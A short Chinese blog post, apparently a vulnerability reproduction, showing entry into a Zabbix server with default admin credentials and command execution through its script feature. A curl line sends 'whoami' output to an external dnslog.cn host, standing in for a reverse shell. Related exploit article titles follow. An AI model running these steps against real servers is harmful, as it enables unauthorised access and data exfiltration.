一、信息收集

1、获取目标平台及url

2、通过外围打点,弱口令大法好,使用默认口令(admin/zabbix)成功进入

3、写入shell脚本

在管理-脚本-创建脚本写入反弹shell命令(本次用dnslog替代实验):

http://x.x.x.x/zabbix/zabbix.php?action=script.edit&scriptid=4

curl 'whoami'.whoami.q7yzw2.dnslog.cn

4、执行shell脚本

4-1:(监控-最新数据)http://x.x.x.x/zabbix/latest.php?ddreset=1,

4-2:点击Host groups的select,全选,本地监听端口然后选择脚本执行

【漏洞复现】Zabbix弱口令再到命令执行Getshell相关推荐

  1. 【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)

    0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run t ...

  2. 漏洞复现-Wordpress 4.6 PwnScriptum RCE命令执行

    Wordpress 4.6 PwnScriptum RCE命令执行 目标介绍 漏洞来源 影响版本 CVE-2016-10033 Vulhub靶场搭建 复现过程 利用条件&问题注意点 解决办法 ...

  3. 漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行

    作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data ...

  4. 漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行

    作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求 ...

  5. [ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509

  6. 复现XXL-JOB 任务调度中心后台任意命令执行漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.漏洞描述 二.影响版本 三.漏洞复现 一.漏洞描述 XXL-JOB 任务调度中心攻击

  7. 【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装.常用组件有 Word.Excel.PowerPoint等. 0x0 ...

  8. 速看!又一个 Redis 高危漏洞,可植入隐秘后门允许命令执行

    公众号关注 「奇妙的 Linux 世界」 设为「星标」,每天带你玩转 Linux ! 被研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞的Redis服 ...

  9. 6-21漏洞利用-mysql弱口令破解

    mysql介绍 Mysql是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于Oracle旗下产品.Mysql 是最流行的关系型数据库管理系统之一,在WEB应用方面,mysql是最好 ...

最新文章

  1. [J2ME] Signing a midlet suite的讨论稿[Update]
  2. MySQL查询结果导出到文件
  3. [转载] python画柱状图-Python绘制精美图表之双柱形图
  4. linux下查看mysql配置文件位置
  5. [Python] jieba库?结巴库?
  6. cactiEZ 配置
  7. 转为html5播放器插件,15个HTML5播放器插件
  8. H3C ipsec psk aggressive mode配置
  9. python代码编程教学无限循环_代码陷入无限循环
  10. UNITY设计一款简单的3d射击小游戏(虚拟现实大作业)
  11. openssh-7.5p1升级
  12. Teradata:数据可视化与模型优化相辅相成
  13. 精华QT安装:qt-opensource-windows-x86-5.14.1
  14. 【LSSVM数据预测】基于matlab灰狼算法优化LSSVM数据预测【含Matlab源码 433期】
  15. 如何判断Linux 内核是稳定版本还是测试版本
  16. python 自动点赞_python实现在有漏洞的网站实现自动注册、登录、点赞
  17. Python习题十一
  18. 【Reference reading】基于PET和MRI的治疗计划系统:在BNCT和GdNCT中对剂量和通量分布的一种现实评估方法
  19. Idea中设置护眼绿
  20. deepin系统安装后检测不到声卡,无声音

热门文章

  1. ecplise工具栏大小设置
  2. 判定给定的字符序列是否为回文【数据结构】【栈】
  3. GNSS文献阅读的一些专业词汇
  4. 电子设计比赛暑期实践报告
  5. 通过Powershell修改文件默认打开方式
  6. mysql 命令行更改utf8 快捷操作
  7. 区块链是否预示着新的科技泡沫即将破灭?
  8. JavaScript内置对象Ⅰ
  9. 《运西瓜》小游戏增加春节新玩法,可以给好友发送新春祝福了
  10. SpringBoot获取Ip并解析地址,Docker部署 (ip2region.xdb)